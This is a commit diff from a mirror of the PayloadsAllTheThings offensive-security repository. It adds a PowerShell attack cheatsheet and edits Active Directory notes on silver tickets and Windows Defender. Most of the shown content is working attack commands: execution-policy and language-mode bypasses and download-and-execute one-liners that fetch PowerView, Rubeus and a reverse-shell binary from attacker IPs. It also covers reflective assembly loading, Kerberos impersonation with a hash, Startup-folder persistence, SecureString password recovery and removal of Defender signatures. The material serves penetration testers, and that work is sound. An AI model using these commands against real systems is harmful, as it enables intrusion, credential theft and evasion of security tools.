mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-20 10:18:50 +00:00
Powershell Cheatsheet
This commit is contained in:
parent
6ff9a71237
commit
7d9dd6806e
@ -1448,7 +1448,7 @@ Interesting services to target with a silver ticket :
|
||||
| Service Type | Service Silver Tickets | Attack |
|
||||
|---------------------------------------------|------------------------|--------|
|
||||
| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` |
|
||||
| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
|
||||
| PowerShell Remoting | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
|
||||
| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
|
||||
| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` |
|
||||
| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` |
|
||||
|
110
Methodology and Resources/Powershell - Cheatsheet.md
Normal file
110
Methodology and Resources/Powershell - Cheatsheet.md
Normal file
@ -0,0 +1,110 @@
|
||||
# Powershell
|
||||
|
||||
## Summary
|
||||
|
||||
* Execution Policy
|
||||
* Encoded Commands
|
||||
* Download file
|
||||
* Load Powershell scripts
|
||||
* Load C# assembly reflectively
|
||||
* Secure String to Plaintext
|
||||
* References
|
||||
|
||||
## Execution Policy
|
||||
|
||||
```ps1
|
||||
powershell -EncodedCommand $encodedCommand
|
||||
powershell -ep bypass ./PowerView.ps1
|
||||
|
||||
# Change execution policy
|
||||
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
|
||||
Set-ExecutionPolicy Bypass -Scope Process
|
||||
```
|
||||
|
||||
## Constrained Mode
|
||||
|
||||
```ps1
|
||||
# Check if we are in a constrained mode
|
||||
# Values could be: FullLanguage or ConstrainedLanguage
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
|
||||
## Bypass
|
||||
powershell -version 2
|
||||
```
|
||||
|
||||
## Encoded Commands
|
||||
|
||||
* Windows
|
||||
```ps1
|
||||
$command = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")'
|
||||
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
|
||||
$encodedCommand = [Convert]::ToBase64String($bytes)
|
||||
```
|
||||
* Linux: :warning: UTF-16LE encoding is required
|
||||
```ps1
|
||||
echo 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/PowerView.ps1")' | iconv -t utf-16le | base64 -w 0
|
||||
```
|
||||
|
||||
## Download file
|
||||
|
||||
```ps1
|
||||
# Any version
|
||||
(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerView.ps1", "C:\Windows\Temp\PowerView.ps1")
|
||||
wget "http://10.10.10.10/taskkill.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
|
||||
Import-Module BitsTransfer; Start-BitsTransfer -Source $url -Destination $output
|
||||
|
||||
# Powershell 4+
|
||||
IWR "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
|
||||
Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
|
||||
```
|
||||
|
||||
## Load Powershell scripts
|
||||
|
||||
```ps1
|
||||
# Proxy-aware
|
||||
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1')
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerView.ps1') | powershell -noprofile -
|
||||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.10.10/PowerView.ps1')|iex"
|
||||
|
||||
# Non-proxy aware
|
||||
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://10.10.10.10/PowerView.ps1',$false);$h.send();iex $h.responseText
|
||||
```
|
||||
|
||||
## Load C# assembly reflectively
|
||||
|
||||
```powershell
|
||||
# Download and run assembly without arguments
|
||||
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/rev.exe')
|
||||
$assem = [System.Reflection.Assembly]::Load($data)
|
||||
[rev.Program]::Main()
|
||||
|
||||
# Download and run Rubeus, with arguments (make sure to split the args)
|
||||
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/Rubeus.exe')
|
||||
$assem = [System.Reflection.Assembly]::Load($data)
|
||||
[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
|
||||
|
||||
# Execute a specific method from an assembly (e.g. a DLL)
|
||||
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.16.7/lib.dll')
|
||||
$assem = [System.Reflection.Assembly]::Load($data)
|
||||
$class = $assem.GetType("ClassLibrary1.Class1")
|
||||
$method = $class.GetMethod("runner")
|
||||
$method.Invoke(0, $null)
|
||||
```
|
||||
|
||||
## Secure String to Plaintext
|
||||
|
||||
```ps1
|
||||
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
|
||||
$user = "HTB\Tom"
|
||||
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
|
||||
$cred.GetNetworkCredential() | fl
|
||||
UserName : Tom
|
||||
Password : 1ts-mag1c!!!
|
||||
SecurePassword : System.Security.SecureString
|
||||
Domain : HTB
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [Windows & Active Directory Exploitation Cheat Sheet and Command Reference - @chvancooten](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
|
||||
* [Basic PowerShell for Pentesters - HackTricks](https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters)
|
@ -274,7 +274,8 @@ PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
|
||||
PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||
|
||||
# remove signatures (if Internet connection is present, they will be downloaded again):
|
||||
PS > "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||
```
|
||||
|
||||
### Firewall
|
||||
|
Loading…
Reference in New Issue
Block a user